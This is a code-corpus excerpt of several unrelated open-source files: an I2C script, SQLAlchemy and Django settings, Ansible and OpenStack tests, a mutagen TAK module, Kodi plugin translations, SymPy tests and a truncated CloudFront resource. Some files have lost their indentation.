Typically you just call represent(value, type=request['ACCEPT']) instead of manually invoking this method.
To be consistent with str(obj) function which uses obj.__str__() method if available, tojson() uses obj._json_()
method if available on value. Otherwise it checks obj._list_() method if available to get the unified list format.
Otherwise it assumes that the value is in unified list format. The _json_ and _list_ semantics allow you to
customize the JSON representation of your object, if needed.
>>> value = ('file', (('name', 'myfile.txt'), ('acl', [('allow', 'kundan'), ('allow', 'admin')])))
>>> tojson(value)
'{"file": {"name": "myfile.txt", "acl": [{"allow": "kundan"}, {"allow": "admin"}]}}'
'''
def list2dict(value):
if hasattr(value, '_json_') and callable(value._json_): return value._json_()
if hasattr(value, '_list_') and callable(value._list_): val
| a2ron44/alfredHomeAutomation | alfredPHP/controller.py | Python | gpl-3.0 | 539 | 0.012987 |
import smbus, sys
import time
bus = smbus.SMBus(1)
# i2c address
address = 0x04
if len(sys.argv) < 3:
    print(-1)
sys.exit()
cmd = sys.argv[1]
msg = sys.argv[2]
msAr = []
for x in msg:
msAr.append(ord(x))
def writeNumber():
#bus.write_byte(address, value)
bus.write_i2c_block_data(address,ord(cmd), msAr)
return -1
def readNumber():
number = bus.read_byte(address)
# number = bus.read_byte_data(address, 1)
return number
writeNumber()
# sleep one second
time.sleep(1)
res = readNumber()
print(res)
| hugovk/terroroftinytown | terroroftinytown/tracker/database.py | Python | mit | 992 | 0 |
# encoding=utf-8
import sqlalchemy
from sqlalchemy.engine import create_engine
from sqlalchemy.pool import SingletonThreadPool
from terroroftinytown.tracker.model import Session, Base
class Database(object):
def __init__(self, path, delete_everything=False):
if path.startswith('sqlite:'):
self.engine = create_engine(path, poolclass=SingletonThreadPool)
sqlalchemy.event.listen(
self.engine, 'connect', self._apply_pragmas_callback)
else:
self.engine = create_engine(path)
Session.configure(bind=self.engine)
if delete_everything == 'yes-really!':
self._delete_everything()
Base.metadata.create_all(self.engine)
@classmethod
def _apply_pragmas_callback(cls, connection, record):
connection.execute('PRAGMA journal_mode=WAL')
connection.execute('PRAGMA synchronous=NORMAL')
def _delete_everything(self):
Base.metadata.drop_all(self.engine)
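# A hedged usage sketch, not part of the original module: an SQLite URL takes
# the SingletonThreadPool/PRAGMA branch above. The path is illustrative, and
# the sentinel string must match exactly for the destructive reset to run.
if __name__ == '__main__':
    database = Database('sqlite:///tracker.db')
    # Database('sqlite:///tracker.db', delete_everything='yes-really!')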
| astrobin/astrobin | astrobin/settings/components/caches.py | Python | agpl-3.0 | 824 | 0.002427 |
import os
CACHE_TYPE = os.environ.get('CACHE_TYPE', 'redis').strip()
if CACHE_TYPE == 'redis':
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': os.environ.get('CACHE_URL', 'redis://redis:6379/1').strip(),
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.DefaultClient',
'PICKLE_VERSION': 2,
'SERIALIZER':'astrobin.cache.CustomPickleSerializer',
},
'KEY_PREFIX': 'astrobin'
}
}
elif CACHE_TYPE == 'locmem':
CACHES = {
'default': {
            'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        }
}
else:
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
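# A hedged usage sketch, not part of the original settings file: whichever
# CACHES dict is selected above, application code reaches it through Django's
# standard cache API.
#
#   from django.core.cache import cache
#   cache.set('greeting', 'hello', timeout=60)
#   assert cache.get('greeting') == 'hello'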
| t3dev/odoo | addons/mrp/models/__init__.py | Python | gpl-3.0 | 608 | 0 |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import mrp_document
from . import mrp_abstract_workorder
from . import res_config_settings
from . import mrp_bom
from . import mrp_routing
from . import mrp_workcenter
from . import mrp_production
from . import stock_traceability
from . import mrp_unbuild
from . import mrp_workorder
from . import product
from . import res_company
from . import stock_move
from . import stock_picking
from . import stock_production_lot
from . import stock_rule
from . import stock_scrap
from . import stock_warehouse
| helldorado/ansible | test/units/modules/network/f5/test_bigiq_device_facts.py | Python | gpl-3.0 | 3,123 | 0.00064 |
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
if sys.version_info < (2, 7):
pytestmark = pytest.mark.skip("F5 Ansible modules require Python >= 2.7")
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigiq_device_facts import Parameters
from library.modules.bigiq_device_facts import SystemInfoFactManager
from library.modules.bigiq_device_facts import ModuleManager
from library.modules.bigiq_device_facts import ArgumentSpec
# In Ansible 2.8, Ansible changed import paths.
from test.units.compat import unittest
from test.units.compat.mock import Mock
from test.units.compat.mock import patch
from test.units.modules.utils import set_module_args
except ImportError:
from ansible.modules.network.f5.bigiq_device_facts import Parameters
from ansible.modules.network.f5.bigiq_device_facts import SystemInfoFactManager
from ansible.modules.network.f5.bigiq_device_facts import ModuleManager
from ansible.modules.network.f5.bigiq_device_facts import ArgumentSpec
# Ansible 2.8 imports
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from units.modules.utils import set_module_args
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
gather_subset=['system-info'],
)
p = Parameters(params=args)
assert p.gather_subset == ['system-info']
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_get_facts(self, *args):
set_module_args(dict(
gather_subset=['system-info'],
provider=dict(
server='localhost',
password='password',
user='admin'
)
))
fixture1 = load_fixture('load_shared_system_setup_1.json')
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
tm = SystemInfoFactManager(module=module)
tm.read_collection_from_device = Mock(return_value=fixture1)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.get_manager = Mock(return_value=tm)
results = mm.exec_module()
assert results['changed'] is True
assert 'system_info' in results
| googleapis/python-securitycenter | google/cloud/securitycenter_v1p1beta1/types/source.py | Python | apache-2.0 | 2,762 | 0.000362 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.cloud.securitycenter.v1p1beta1", manifest={"Source",},
)
class Source(proto.Message):
r"""Security Command Center finding source. A finding source
is an entity or a mechanism that can produce a finding. A source
is like a container of findings that come from the same scanner,
logger, monitor, etc.
Attributes:
name (str):
The relative resource name of this source. See:
https://cloud.google.com/apis/design/resource_names#relative_resource_name
Example:
"organizations/{organization_id}/sources/{source_id}".
display_name (str):
The source's display name.
A source's display name must be unique amongst
its siblings, for example, two sources with the
same parent can't share the same display name.
The display name must have a length between 1
and 64 characters (inclusive).
description (str):
The description of the source (max of 1024
characters). Example:
"Web Security Scanner is a web security scanner
for common vulnerabilities in App Engine
applications. It can automatically scan and
detect four common vulnerabilities, including
cross-site-scripting (XSS), Flash injection,
mixed content (HTTP in HTTPS), and
outdated/insecure libraries.".
canonical_name (str):
The canonical name of the finding. It's either
"organizations/{organization_id}/sources/{source_id}",
"folders/{folder_id}/sources/{source_id}" or
"projects/{project_number}/sources/{source_id}", depending
on the closest CRM ancestor of the resource associated with
the finding.
"""
name = proto.Field(proto.STRING, number=1,)
    display_name = proto.Field(proto.STRING, number=2,)
description = proto.Field(proto.STRING, number=3,)
canonical_name = proto.Field(proto.STRING, number=14,)
__all__ = tuple(sorted(__protobuf__.manifest))
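# A hedged construction sketch, not part of the original module: proto-plus
# messages accept their fields as keyword arguments. The resource names are
# illustrative.
if __name__ == '__main__':
    source = Source(
        name="organizations/123/sources/456",
        display_name="Example Scanner",
        description="An illustrative finding source.",
    )
    print(source.display_name)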
| ntymtsiv/tempest | tempest/api/compute/v3/admin/test_servers.py | Python | apache-2.0 | 7,222 | 0 |
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import exceptions
from tempest import test
from tempest.test import attr
from tempest.test import skip_because
class ServersAdminV3Test(base.BaseV3ComputeAdminTest):
"""
Tests Servers API using admin privileges
"""
_interface = 'json'
@classmethod
def setUpClass(cls):
super(ServersAdminV3Test, cls).setUpClass()
cls.client = cls.servers_admin_client
cls.non_admin_client = cls.servers_client
cls.flavors_client = cls.flavors_admin_client
cls.s1_name = data_utils.rand_name('server')
resp, server = cls.create_test_server(name=cls.s1_name,
wait_until='ACTIVE')
cls.s1_id = server['id']
cls.s2_name = data_utils.rand_name('server')
resp, server = cls.create_test_server(name=cls.s2_name,
wait_until='ACTIVE')
cls.s2_id = server['id']
def _get_unused_flavor_id(self):
flavor_id = data_utils.rand_int_id(start=1000)
while True:
try:
resp, body = self.flavors_client.get_flavor_details(flavor_id)
except exceptions.NotFound:
break
flavor_id = data_utils.rand_int_id(start=1000)
return flavor_id
@attr(type='gate')
def test_list_servers_by_admin(self):
# Listing servers by admin user returns empty list by default
resp, body = self.client.list_servers_with_detail()
servers = body['servers']
self.assertEqual('200', resp['status'])
self.assertEqual([], servers)
@test.skip_because(bug='1265416')
@attr(type='gate')
def test_list_servers_by_admin_with_all_tenants(self):
# Listing servers by admin user with all tenants parameter
        # All servers should be listed here
params = {'all_tenants': ''}
resp, body = self.client.list_servers_with_detail(params)
servers = body['servers']
servers_name = map(lambda x: x['name'], servers)
self.assertIn(self.s1_name, servers_name)
self.assertIn(self.s2_name, servers_name)
@attr(type='gate')
def test_admin_delete_servers_of_others(self):
# Administrator can delete servers of others
_, server = self.create_test_server()
resp, _ = self.client.delete_server(server['id'])
self.assertEqual('204', resp['status'])
self.servers_client.wait_for_server_termination(server['id'])
@attr(type='gate')
def test_delete_server_while_in_error_state(self):
        # Delete a server while its VM state is error
resp, server = self.create_test_server(wait_until='ACTIVE')
resp, body = self.client.reset_state(server['id'], state='error')
self.assertEqual(202, resp.status)
# Verify server's state
resp, server = self.client.get_server(server['id'])
self.assertEqual(server['status'], 'ERROR')
resp, _ = self.client.delete_server(server['id'])
self.assertEqual('204', resp['status'])
@attr(type='gate')
def test_reset_state_server(self):
# Reset server's state to 'error'
resp, server = self.client.reset_state(self.s1_id)
self.assertEqual(202, resp.status)
# Verify server's state
resp, server = self.client.get_server(self.s1_id)
self.assertEqual(server['status'], 'ERROR')
# Reset server's state to 'active'
resp, server = self.client.reset_state(self.s1_id, state='active')
self.assertEqual(202, resp.status)
# Verify server's state
resp, server = self.client.get_server(self.s1_id)
self.assertEqual(server['status'], 'ACTIVE')
@attr(type='gate')
@skip_because(bug="1240043")
def test_get_server_diagnostics_by_admin(self):
# Retrieve server diagnostics by admin user
        resp, diagnostic = self.client.get_server_diagnostics(self.s1_id)
self.assertEqual(200, resp.status)
basic_attrs = ['rx_packets', 'rx_errors', 'rx_drop',
'tx_packets', 'tx_errors', 'tx_drop',
'read_req', 'write_req', 'cpu', 'memory']
for key in basic_attrs:
self.assertIn(key, str(diagnostic.keys()))
@attr(type='gate')
def test_list_servers_filter_by_error_status(self):
# Filter the list of servers by server error status
params = {'status': 'error'}
resp, server = self.client.reset_state(self.s1_id, state='error')
resp, body = self.non_admin_client.list_servers(params)
# Reset server's state to 'active'
resp, server = self.client.reset_state(self.s1_id, state='active')
# Verify server's state
resp, server = self.client.get_server(self.s1_id)
self.assertEqual(server['status'], 'ACTIVE')
servers = body['servers']
# Verify error server in list result
self.assertIn(self.s1_id, map(lambda x: x['id'], servers))
self.assertNotIn(self.s2_id, map(lambda x: x['id'], servers))
@attr(type='gate')
def test_rebuild_server_in_error_state(self):
# The server in error state should be rebuilt using the provided
# image and changed to ACTIVE state
        # resetting VM state requires admin privilege
resp, server = self.client.reset_state(self.s1_id, state='error')
self.assertEqual(202, resp.status)
resp, rebuilt_server = self.non_admin_client.rebuild(
self.s1_id, self.image_ref_alt)
self.addCleanup(self.non_admin_client.wait_for_server_status,
self.s1_id, 'ACTIVE')
self.addCleanup(self.non_admin_client.rebuild, self.s1_id,
self.image_ref)
# Verify the properties in the initial response are correct
self.assertEqual(self.s1_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertEqual(self.image_ref_alt, rebuilt_image_id)
self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id'])
self.non_admin_client.wait_for_server_status(rebuilt_server['id'],
'ACTIVE',
raise_on_error=False)
# Verify the server properties after rebuilding
resp, server = self.non_admin_client.get_server(rebuilt_server['id'])
rebuilt_image_id = server['image']['id']
self.assertEqual(self.image_ref_alt, rebuilt_image_id)
| metabrainz/picard | picard/formats/mutagenext/tak.py | Python | gpl-2.0 | 2,426 | 0.000825 |
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
#
# Copyright (C) 2008 Lukáš Lalinský
# Copyright (C) 2013, 2018-2021 Laurent Monin
# Copyright (C) 2017 Sambhav Kothari
# Copyright (C) 2018-2019 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Tom's lossless Audio Kompressor streams with APEv2 tags.
TAK is a lossless audio compressor developed by Thomas Becker.
For more information, see http://wiki.hydrogenaudio.org/index.php?title=TAK
and http://en.wikipedia.org/wiki/TAK_(audio_codec)
"""
__all__ = ["TAK", "Open", "delete"]
try:
from mutagen.tak import (
Open,
TAK,
TAKHeaderError,
TAKInfo,
delete
)
native_tak = True
except ImportError:
from mutagen import StreamInfo
from mutagen.apev2 import (
APEv2File,
delete,
error,
)
native_tak = False
class TAKHeaderError(error):
pass
class TAKInfo(StreamInfo):
"""TAK stream information.
Attributes:
(none at the moment)
"""
def __init__(self, fileobj):
header = fileobj.read(4)
if len(header) != 4 or not header.startswith(b"tBaK"):
raise TAKHeaderError("not a TAK file")
@staticmethod
def pprint():
return "Tom's lossless Audio Kompressor"
class TAK(APEv2File):
"""TAK(filething)
Arguments:
filething (filething)
Attributes:
            info (`TAKInfo`)
"""
_Info = TAKInfo
_mimes = ["audio/x-tak"]
@staticmethod
def score(filename, fileobj, header):
return header.startswith(b"tBaK") + filename.lower().endswith(".tak")
Open = TAK
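# A hedged usage sketch, not part of the original module: whichever branch of
# the try/except supplied TAK, it behaves as an APEv2-tagged file. The
# filename is illustrative.
if __name__ == '__main__':
    tak_file = TAK("example.tak")
    if tak_file.tags is None:
        tak_file.add_tags()
    tak_file["Title"] = "Example Title"
    tak_file.save()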
| chimkentec/KodiMODo_rep | plugin.video.torrenter/Localization.py | Python | gpl-3.0 | 56,942 | 0.008658 |
# -*- coding: utf-8 -*-
'''
Torrenter v2 plugin for XBMC/Kodi
Copyright (C) 2012-2015 Vadim Skorba v1 - DiMartino v2
https://forums.tvaddons.ag/addon-releases/29224-torrenter-v2.html
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
try:
import xbmcaddon
__settings__ = xbmcaddon.Addon(id='plugin.video.torrenter')
language = ('en', 'ru', 'uk','he')[int(__settings__.getSetting("language"))]
except:
language = 'ru'
def localize(text):
dictionary = {
'he': {
'Seeds searching.': 'חיפוש זורעים',
'Please Wait': 'המתן',
'Information': 'מידע',
'Torrent downloading is stopped.': 'הורדה הופסקה',
'Search': 'חפש',
'Seeds': 'זורעים',
'Peers': 'יונקים',
'Materials are loading now.': 'עולה כעת',
'Search Phrase': 'חפש',
'Magnet-link is converting': 'הקובץ נטען',
'Error': 'טעות',
'Your library out of date and can\'t save magnet-links.': 'הספריה אינה מעודכנת',
'Bookmarks': 'סימניות',
'Logout': 'התנתק',
'Login': 'התחבר',
'Recent Materials': 'חומרים אחרונים ',
'Register': 'הרשם',
'Bookmark': 'סמניות',
'Item successfully added to Bookmarks': 'הפריט הוסף לסמניות',
'Item successfully removed from Bookmarks': 'הפריט הוסר מהסימניות בהצלחה',
'Bookmark not added': 'סימניה לא הוספה',
'Bookmark not removed': 'הסימניה לא הוסרה',
'Add To Bookmarks': 'הוסף לסימניות',
'Remove From Bookmarks': 'הסר מסימניות',
'Auth': 'אישור',
'Already logged in': 'Already logged in',
'Input Email (for password recovery):': 'Input Email (for password recovery):',
'Input Email:': 'Input Email:',
'Input Password (6+ symbols):': 'Input Password (6+ symbols):',
'Input Password:': 'Input Password',
'Login successfull': 'Login successfull',
'Login failed': 'Login failed',
'User not logged in': 'Пользователь не в системе',
'User successfully logged out': 'User successfully logged out',
'Preloaded: ': 'טוען מראש',
'Do you want to STOP torrent downloading and seeding?': 'להפסיק הורדת טורנט?',
'Torrent Downloading': 'טורנט בהורדה',
'Auth expired, please relogin': 'Auth expired, please relogin',
'Storage': 'אחסון',
'Storage has been cleared': 'אחסון נוקה',
'Clear Storage': 'נקה אחסון',
'Popular': 'פופולארי',
'Views': 'צפיות',
'Uploading': 'מעלה',
'Download': 'מוריד',
'Input symbols from CAPTCHA image:': 'Input symbols from CAPTCHA image:',
'Please, rate watched video:': 'Please, rate watched video:',
'Bad': 'Bad',
'So-So': 'So-So',
'Good': 'Good',
'Ratings': 'Ratings',
'Rating': 'דירוג',
'Retry': 'נסה שנית',
'%ds has left': '%ds has left',
'File failed to play! Do you want to RETRY and buffer more?': 'הקובץ נכשל האם לנסות שנית?',
'High Priority Files': 'קבצים בחשיבות עליונה',
'Skip All Files': 'דלג על כל הקבצים',
'Start': 'התחל',
'Stop': 'עצור',
'Play':'נגן',
'High Priority': 'חשיבות גבוהה',
'Skip File': 'דלג על הקובץ',
'Remove': 'הסר',
'Remove with files': 'הסר קבצים',
'Play File': 'נגן קובץ',
'Start All Files': 'התחל את כל הקבצים',
'Stop All Files': 'הפסק את כל הקבצים',
'Torrent-client Browser': 'דפדפן טורנט',
'Remote Torrent-client': 'טורנט מרוחק',
'You didn\'t set up replacement path in setting.': 'נא למלא נתיב לשמירה בהגדרות',
'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?': 'For example /media/dl_torr/ to smb://SERVER/dl_torr/. Setup now?',
'Manual Torrent-client Path Edit': 'Manual Torrent-client Path Edit',
'Choose .torrent in video library': 'בחר בטורנט מהספריה',
'.torrent Player': 'נגן טורנט',
'Choose directory:': 'בחר מיקום:',
'Starting download next episode!': 'מתחיל להורד בפרק הבא',
'Choose in torrent-client:': 'בחר לקוח טורנט',
'Search Control Window': 'הגדרת טראקרים',
'Magnet-link (magnet:...)': ' (magnet:...)קישור מגנט',
'Not a magnet-link!': 'לא קישור מגנט',
'Magnet-link Player': 'נגן קישור מגנט',
'UNKNOWN STATUS': 'סטטוס לא ידוע',
'Checking preloaded files...': 'בודק קבצים',
'Waiting for website response...': 'ממתין לתשובת האתר ',
'Search and cache information for:': 'תקצירי הסרטים יורדים',
'Open Torrent': 'פתח טורנט',
'Torrent list is empty.': 'רשימה ריקה',
'Content Lists': 'רשימות תוכן ההרחבה',
'Canceled by User': 'בוטל',
            'Do you want to search and cache full metadata + arts?': 'האם תרצה להוריד מידע על הסרטים',
            'This vastly decreases load speed, but you will be asked to download premade bases!': 'זה יאט את קצב ההעלאה אך יוריד מידע על הסרטים',
'Do you want to preload full metadata?': 'האם תרצה להוריד את כל המידע',
'It is highly recommended!': 'מומלץ',
'TV Shows': 'סדרות',
'Cartoons': 'אנימציה',
'Anime': 'אנימה',
'Most Recent': 'החדשים ביותר',
'Top 250 Movies': '250 הטובים ביותר',
'Top All Time': 'הטובים בכל הזמנים',
'by Genre': 'לפי קטגוריה',
'by Year': 'לפי שנה',
'Action': 'פעולה',
'Adventure': 'הרפתקאות',
'Animation': 'אנימציה',
'Biography': 'ביוגרפי',
'Comedy': 'קומדיה',
'Crime': 'פשע',
'Documentary': 'דוקומנטרי',
'Drama': 'דרמה',
'Family': 'משפחתי',
'Fantasy': 'פנטסיה',
'Film-Noir': 'פילם נואר',
'History': 'היסטורי',
'Horror': 'אימה',
'Music': 'מוזיקה',
'Musical': 'מחזמר',
'Mystery': 'מסתורי',
'Romance': 'רומנטי',
'Sci-Fi': 'מדע בדיוני',
'Short': 'קצר',
'Sport': 'ספורט',
'Thriller': 'מותחן',
'War': 'מלחמתי',
'Western': 'מערבון',
'[B]by Site[/B]': '[B]על פי אתר[/B]',
'Cartoons Series': 'סדרה מצוירת',
'Cartoons Short': 'מצוירים -קצר',
'Male': 'גבר',
'Female': 'אשה',
'Russia & USSR': 'רוסיה',
'Next Page': 'הדף הבא',
'Previous Page': 'הדף הקודם',
'Russian Movies': 'סרטים רוסיים',
'israeli Movies': 'סרטים ישראלים',
'hebdub movies': 'סרטים מדובבים',
'Movies': 'סרטים',
'High Resolution Movies': 'סרטים באיכות גבוהה',
'3D Movies': '3D סרטי',
'Movies [Bluray]': ' [Bluray] סרטים ',
'Anime Film': 'סרטי אנימה',
'Anime Series': 'סדרות אנימה',
'Can\'t download torrent, probably no seeds available.': 'לא ניתן להוריד את הטורנט אין מספיק זורעים',
'Personal List': 'רשימה אישית',
'Add to %s': '%s הוסף ל ',
'Delete from %s': 'מחק מ %s',
'Added!': 'נוסף!',
'Deleted!': 'נמחק',
'Sear
| wxgeo/geophar | wxgeometrie/sympy/codegen/tests/test_rewriting.py | Python | gpl-2.0 | 4,843 | 0.000413 |
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
from sympy import log, exp, Symbol, Pow, sin
from sympy.printing.ccode import ccode
from sympy.codegen.cfunctions import log2, exp2, expm1, log1p
from sympy.codegen.rewriting import (
optimize, log2_opt, exp2_opt, expm1_opt, log1p_opt, optims_c99,
create_expand_pow_optimization
)
from sympy.utilities.pytest import XFAIL
def test_log2_opt():
x = Symbol('x')
expr1 = 7*log(3*x + 5)/(log(2))
opt1 = optimize(expr1, [log2_opt])
assert opt1 == 7*log2(3*x + 5)
assert opt1.rewrite(log) == expr1
expr2 = 3*log(5*x + 7)/(13*log(2))
opt2 = optimize(expr2, [log2_opt])
assert opt2 == 3*log2(5*x + 7)/13
assert opt2.rewrite(log) == expr2
expr3 = log(x)/log(2)
opt3 = optimize(expr3, [log2_opt])
assert opt3 == log2(x)
assert opt3.rewrite(log) == expr3
expr4 = log(x)/log(2) + log(x+1)
opt4 = optimize(expr4, [log2_opt])
assert opt4 == log2(x) + log(2)*log2(x+1)
assert opt4.rewrite(log) == expr4
expr5 = log(17)
opt5 = optimize(expr5, [log2_opt])
assert opt5 == expr5
expr6 = log(x + 3)/log(2)
opt6 = optimize(expr6, [log2_opt])
assert str(opt6) == 'log2(x + 3)'
assert opt6.rewrite(log) == expr6
def test_exp2_opt():
x = Symbol('x')
expr1 = 1 + 2**x
opt1 = optimize(expr1, [exp2_opt])
assert opt1 == 1 + exp2(x)
assert opt1.rewrite(Pow) == expr1
expr2 = 1 + 3**x
assert expr2 == optimize(expr2, [exp2_opt])
def test_expm1_opt():
x = Symbol('x')
expr1 = exp(x) - 1
opt1 = optimize(expr1, [expm1_opt])
assert expm1(x) - opt1 == 0
assert opt1.rewrite(exp) == expr1
expr2 = 3*exp(x) - 3
opt2 = optimize(expr2, [expm1_opt])
assert 3*expm1(x) == opt2
assert opt2.rewrite(exp) == expr2
expr3 = 3*exp(x) - 5
assert expr3 == optimize(expr3, [expm1_opt])
expr4 = 3*exp(x) + log(x) - 3
opt4 = optimize(expr4, [expm1_opt])
assert 3*expm1(x) + log(x) == opt4
assert opt4.rewrite(exp) == expr4
expr5 = 3*exp(2*x) - 3
opt5 = optimize(expr5, [expm1_opt])
assert 3*expm1(2*x) == opt5
assert opt5.rewrite(exp) == expr5
@XFAIL
def test_expm1_two_exp_terms():
x, y = map(Symbol, 'x y'.split())
expr1 = exp(x) + exp(y) - 2
opt1 = optimize(expr1, [expm1_opt])
assert opt1 == expm1(x) + expm1(y)
def test_log1p_opt():
x = Symbol('x')
expr1 = log(x + 1)
opt1 = optimize(expr1, [log1p_opt])
assert log1p(x) - opt1 == 0
assert opt1.rewrite(log) == expr1
expr2 = log(3*x + 3)
opt2 = optimize(expr2, [log1p_opt])
assert log1p(x) + log(3) == opt2
assert (opt2.rewrite(log) - expr2).simplify() == 0
expr3 = log(2*x + 1)
opt3 = optimize(expr3, [log1p_opt])
assert log1p(2*x) - opt3 == 0
assert opt3.rewrite(log) == expr3
expr4 = log(x+3)
opt4 = optimize(expr4, [log1p_opt])
assert str(opt4) == 'log(x + 3)'
def test_optims_c99():
x = Symbol('x')
expr1 = 2**x + log(x)/log(2) + log(x + 1) + exp(x) - 1
opt1 = optimize(expr1, optims_c99).simplify()
assert opt1 == exp2(x) + log2(x) + log1p(x) + expm1(x)
assert opt1.rewrite(exp).rewrite(log).rewrite(Pow) == expr1
expr2 = log(x)/log(2) + log(x + 1)
opt2 = optimize(expr2, optims_c99)
assert opt2 == log2(x) + log1p(x)
assert opt2.rewrite(log) == expr2
expr3 = log(x)/log(2) + log(17*x + 17)
opt3 = optimize(expr3, optims_c99)
delta3 = opt3 - (log2(x) + log(17) + log1p(x))
assert delta3 == 0
assert (opt3.rewrite(log) - expr3).simplify() == 0
expr4 = 2**x + 3*log(5*x + 7)/(13*log(2)) + 11*exp(x) - 11 + log(17*x + 17)
opt4 = optimize(expr4, optims_c99).simplify()
delta4 = opt4 - (exp2(x) + 3*log2(5*x + 7)/13 + 11*expm1(x) + log(17) + log1p(x))
assert delta4 == 0
assert (opt4.rewrite(exp).rewrite(log).rewrite(Pow) - expr4).simplify() == 0
expr5 = 3*exp(2*x) - 3
opt5 = optimize(expr5, optims_c99)
delta5 = opt5 - 3*expm1(2*x)
assert delta5 == 0
assert opt5.rewrite(exp) == expr5
expr6 = exp(2*x) - 3
opt6 = optimize(expr6, optims_c99)
delta6 = opt6 - (exp(2*x) - 3)
assert delta6 == 0
expr7 = log(3*x + 3)
    opt7 = optimize(expr7, optims_c99)
delta7 = opt7 - (log(3) + log1p(x))
assert delta7 == 0
assert (opt7.rewrite(log) - expr7).simplify() == 0
expr8 = log(2*x + 3)
opt8 = optimize(expr8, optims_c99)
    assert opt8 == expr8
def test_create_expand_pow_optimization():
my_opt = create_expand_pow_optimization(4)
x = Symbol('x')
assert ccode(optimize(x**4, [my_opt])) == 'x*x*x*x'
x5x4 = x**5 + x**4
assert ccode(optimize(x5x4, [my_opt])) == 'pow(x, 5) + x*x*x*x'
sin4x = sin(x)**4
assert ccode(optimize(sin4x, [my_opt])) == 'pow(sin(x), 4)'
|
mitchellrj/touchdown
|
touchdown/aws/cloudfront/streaming_distribution.py
|
Python
|
apache-2.0
| 6,002
| 0.001666
|
# Copyright 2014-2015 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from touchdown.core.resource import Resource
from touchdown.core.plan import Plan, Present
from touchdown.core import argument, serializers
from ..account import BaseAccount
from ..common import SimpleDescribe, SimpleApply, SimpleDestroy, RefreshMetadata
from ..s3 import Bucket
from .. import route53
from .common import CloudFrontList
class StreamingLoggingConfig(Resource):
resource_name = "streaming_logging_config"
dot_ignore = True
enabled = argument.Boolean(field="Enabled", default=False)
bucket = argument.Resource(Bucket, field="Bucket", serializer=serializers.Default(default=None), default="")
prefix = argument.String(field="Prefix", default="")
class StreamingDistribution(Resource):
resource_name = "streaming_distribution"
extra_serializers = {
"CallerReference": serializers.Expression(
lambda runner, object: runner.get_plan(object).object.get('StreamingDistributionConfig', {}).get('CallerReference', str(uuid.uuid4()))
),
"Aliases": CloudFrontList(serializers.Chain(
serializers.Context(serializers.Argument("cname"), serializers.ListOfOne(maybe_empty=True)),
serializers.Context(serializers.Argument("aliases"), serializers.List()),
)),
"TrustedSigners": serializers.Const({
"Enabled": False,
"Quantity": 0,
}),
"S3Origin": serializers.Resource(group="s3origin"),
}
name = argument.String()
cname = argument.String(default=lambda instance: instance.name)
comment = argument.String(field='Comment', default=lambda instance: instance.name)
